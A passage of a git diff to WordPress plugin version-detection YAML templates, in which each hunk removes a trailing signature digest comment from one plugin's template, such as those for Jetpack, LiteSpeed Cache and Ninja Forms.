b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 60de4225b0..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b3b45edd20e7890f32795ad8969468255ff487e4037f315f7912eb85611cbaeb022100d36b8d5d813510552c3bcb0014abfb1ebda219541cf3caf9199e856423551c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 49fa6fd35b..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220763d27399fc30e32e3cc846111fe70067661fa017241c2bc9a075620a15754650220114f4c19dd6cb126bad056e643b415ec8b7113d145c3b1ed5673a393f004a8a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index ccd0d132df..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022002edb5f9f6be5b678c6b2fce5a755c320049086376f9b552a4485888dbec01060220427e4dfc74e6e94f7141956c4fb8c9a7f16bbf50661b135a50469f2870567fa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7f3daf5ac8..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b061ee93cf3f6d53cbca63dba2682f3b81baeb31fa5cc0fcbf1b6b7bc22a8f55022100f99188d598378d834094d479f2e4d3c49841ff86a78d8aabda25f133293bb629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 2df0bc33cf..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc68c6b964289988fcd0952ecdfa914d8d7f06675107b1820be09e1c37c7c0f0022034b056418749cd8d07cfedaf2541ba7f271b85650e5d1f646d19f2f4237e7ca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 62c8e20422..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001d843d996fb1b8eb83d8a1e288f486eb13dd41f2856c365a90f82bd7b0384d802210093ae53aac96cadae43d915946f1e96e899d8634646af6ad669e0884f5deee595:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 6222c0d2b4..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210093053619c2e285f2534fdc1a718372e409481f4d0af0db0be3c62bc864fe5163022100973a0a0a13a14b635b6aea2e0d73007ead2437c9bcbd5ce432c25886ccb172d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 581fef72b5..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201333a2837d71cf1dfdb17246c80800d4709ef284c0f3cee8930083133f5ba3b7022100a0498e7688aad3ee9eeb4c9a9f719a636f92f0eda102a0126932f7024f6c7cff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 29c8879c85..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ebfad07c54d558f91ca54dd1ac5176f44d1cd4975d5e5c11fa3dca8a52882e5f0220295e2b92bec86605c0cfa6c4bda218ed908ae9b2473399882c6e95fb7c8a3c96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 1413c2dd46..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a038b3210f4baf3933d02c3fcc191f3ebb6c3a5dd75fc70cc4189381e4f46ba022100d30d1d98080993c301d9b03356de6aa3d8bc343b42d7723b93cf6f47b47e1056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4e5e95d80c..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a4004fd28c0ec27c161a4e749d339c8f7e2c9769d8d622c3be6cfb0587fe8bd702201ed15017ef226aaa5ca3305fb9018f7c1316547244e51851d6623137cd012e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 92d2c7ecbf..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210086db187cb7598383d00bbfd697be1950e14515b6097582a40bad8ae66d304fba022100f35c8f2a5148c027ec960128c1c72a909c6406681a7090f45e6f2c0563b73ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 0571a0bf52..cd248e018b 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220231cd299a15349df2a302c91efc8fab2662ece12e43d718d517852a76350b1b1022021d9ff4165c3d9c5a8dd95721cdcd0a5e1285247730059904d31b19ecc7f73c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 723d9be870..7e62a84cca 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090a95a305d7234aae382123155af38abfc368286d802e9fdd76c4e26a55b744d022100fdddfe839d519d1a3516984b2d5413735e794dc577de94eb71aaa8acd07bfd2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 960fcdb90c..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3fceb29a0e792f937f552cdff96b47a24bf47d0c1a5254dbc45dbd239bfc339022100f7dcadf799e30cd248f51d695249d34d80f11898e7b062dbaf9ea748832c9ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index e962d3852d..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c6928d57fa3099f19fcb4dfb0ea78c682b139cbadf6ba59631aa31e6630f5413022078c864f5d147ac28772823092a40d9145c6719747239da7d0e4464f29cdd1237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 228ebc5dd8..c7ae2d51dd 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d98a6fcdd3090f15499090b21db28b812c7b2cfede97588efcdea568b7eb9a802203ded8da8c5dca2eee2bf7fd75037bf42d3091dea550408612c63cbc0c9273a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 97568c2268..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d7c0a4c423cb5403af9f9da752748527ba7332e024257bee371b424edfebf4b3022010c3a2cec2dd2e85b81ee516f882c05f6648919e4d0d8b53936cf8cc78f3fd7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 89eb70032d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090b586143b3e3c9a3903dd4de68d8d7f5aedb3f45e7b35de92774bb567b2c823022100db81d9c5fb434f7946ae21bef2237a94a23e3a0ceccb864521c6477cf4d36618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3cf06f71a6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ecddefb917ad7226594ce35d8606c530b5ebe859025b9e488c14673f7e8153b5022100c5d562b867ff41917c602b3877192175f61a783e30da18f95816ea06d2102190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index d140989d53..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220709f081c8e0619dd0e7132dc3798b03e3b9f0cbf55eabccf4c48b56fa90dadb90221008c5db23e63189a7da4fadb2d177db596a5ad150e6be1b4db1a78a08d3f613839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 5f38118ac1..299e5e4cb6 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e372e3bbd285248776c0a0b4dc92e1f445ee15511abec3f5021a2fcc5a7ae35b022100c21808f12192b9acbc975758e7515de47caa41aa4c4647624b8aae2a8bfe77b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 2dbdfb9ea5..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022011b23fad64e67bf6f1f9b042f77dd490198d2c873c15d491a3bfc2fd3e32099702204d69670ea68d1da3f988bcf62619a5871261bb3fab86f7ef1439cf3eb5ce25d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 012de55e8d..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206b32fa7c7dc1498bcb4bcaccf18a09120e73a28d2cca6aa9bc9fc3500bcc99e802202cd6e046318706dfb04dd5937a5b4050abbce38ca1dd18a7c771a09989cf0e81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index f474b75f12..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ba6ab6a62d4a8ca75c55f644cabac15778ad5f2cf96d47bf0d0ca7628bbec05a02202aabc16b0b62907d3db70fc3acef564dccac94e50b8250887318c7373172676a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 62e5780363..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022076b459a65a97637239910c4f016e5dc67b7e7c26b67d39929e6ce175c68ca8e3022100f0eb6a1cbc32c3ce62147799546279c535ab903358694de42101af3939342882:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index d5fff28aff..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210089e2cf31119e068cecfba7f8a6630da65b48077ff84ddc99b035293d2c7aaf59022100d64f28f99d77b01e236cc46ef025ed5f24f5ac4a15621f70e0f8325cf47b7513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index f5f3e23682..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dc529b2d36c660bc7f8bb1f49d1a5e5776ff19f11b18e6160ea7ea82c8610f0102202bf18e2ad5704a43b4c4ee2e53d61f0478357c3a87c632134210e910303dd7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 466eb4eff9..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e1cedff211eb30cbde820c83a54ac37af6df791c741b970899afac2521847c002202001fa766ce6ad845bbf46f6a911ee9643a4d84a8d196fee14729ef8333e698d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 94ecb82af3..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220363d559db71bca4e6bacca57863ff45f784dbe9d83e2fbe51467abe4e33a9354022100dc130f1ae54e452a2b08a315621e0bb2fda2b897e2cbcd6382ce6ac06797fc41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 21a920704a..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022042d792adcfd9da20a6438d9332715ebffa051d7c8e460cf0ad9c8dc6e1abf17302205be146f7cefa3b49bcaeceed260b17284fbc467b244e35701d6be1132571a95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 4be66afe59..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c1a4c1d0b54939129e0c98b8a48bb7b3a0b66a02dc5e4582a1988ba757be542022100e558718378ec35ab134553cccdc1b6d55427552894dcbb84801f0a2016618aff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 0ca7588e6c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9d903b9bb4cde62d1df3e6f9837afed15f9b51d12ca15ab45fce73e9024520e02210093206484a8582182692533388b184076a98ebe8aa816141939dc52a1662056cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 302c32f2fd..5685dd5f08 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202317358efd65b34de2b098dc27475bf0f045c42cec6324cbff531e49cb5668ca022034e55b0438d59563c1534eaa66b7b4450e27571c640403b515b77d23bb807324:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 77fbf8034b..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c97efde959362ea917eb4cd5753a8de37d67e6a0778e785ca0ec13b70d81f9fa02200157de00d6c3d3051387351966a0ee6a1992bcb5e585149d553a430fcf36bbef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 16ecff2820..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220734aa45a81cdde2788ce1a69063d6a12c94afc05d5b75fa8ae00a4ed17b4774202205c3b09bd5f350887e8b0a804a6c9cd9999a4f39592ed445ca4380b53ca0cfd69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index a52c4dd8d1..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017fe54a9bf1c2b053104d13f3c8aa86f663b02953b4e17608db20bbba7708540022100aea0d118384ac6c844025e5c6d3dce511ebf58724df32b6a9698e2b401687939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index a69af92922..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa07785796bfd4a57955323be813ad639140586a8f52fafac6041b81ed7c68e5022074fb21c65a8e19b098af28f15b4bbd88baa4bf6842df4c335f15d11d74c26190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 3b14af9787..effba09471 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025e237a6d344100c0bf9a7b0d7ac0ab8ee21e3450654f97eeacebb873c0063cb022100f5cdff61cbc80f3b16e961f246cdb430c3d30e7c9fc4184185da044bdfeaeac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 36b1fb9e4c..37153b7ae5 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004242366b1ff68b768ae27934051864857b2a081c138b84b3ba46bed6fdfc433022022dbb4ead02f5e10e80da9b260f77cbaf259778253e128bb9b17a8b82f88e787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 9e00053396..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022075c6ddc124907e3cb4e711923d8759125ac7c327cf32bf74531a0aa4f636deb7022042cb636578caaeff5c485d2f7871cc09a817181ae66cbbb7b60a82a79c66c669:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index c8f392f67d..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aaaf602239f077a29cee57137feec3d33a8b94194999638da7750ea25fc9a9370220194225389c8a4962ece9c6d6f8319f9aa7493372a1a46e66d6e1ddf354907cfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 696ea35f5f..3462f5ea6b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220361289f820db1b57f66b54af13d510c095a8d2c887bf25f4834f0c3d403b916402207c589f3e0e0b8cad18f62ca2b6a2b0a909fb9c57390a94c738d0de15fdc9f7ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 58b5bbe2cd..5c9ae8bc4f 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022011f37dfea682c44d81d02f399707c1b2e068c5609c32030c687ae6dbcf8764140220713a5c1ddbbc1c5f0ee6d11602ed5579c50ba79df2f420c1bfad01db9b8b8924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index dd465993a0..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100996dd0df1cced1f7912da6797c847a6250bd650d8b481ec6de2582246c42569a022100e34364209d6dc8ba574344d837d96d499d1056a193179b2b8aa214902105a1eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index ccce570cfc..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a1b5a9c535534e528fea5ed6b457f797ddb51c01a384c8505e32f7680b4f6db5022041417f43efd0931358b94eb2b2156494d6fb5227a649780a448ed4a14d90dba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 57b5ffcab4..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c03c1160107ccf2ac946a01fa6e3dbcfef5ea7a059c52360225887fb87e1b8af022100ac7a1023faa60a230d03fd69f7ab168a7e271bd8b56e56abe7b02ceb0a902a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index aaf4413330..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 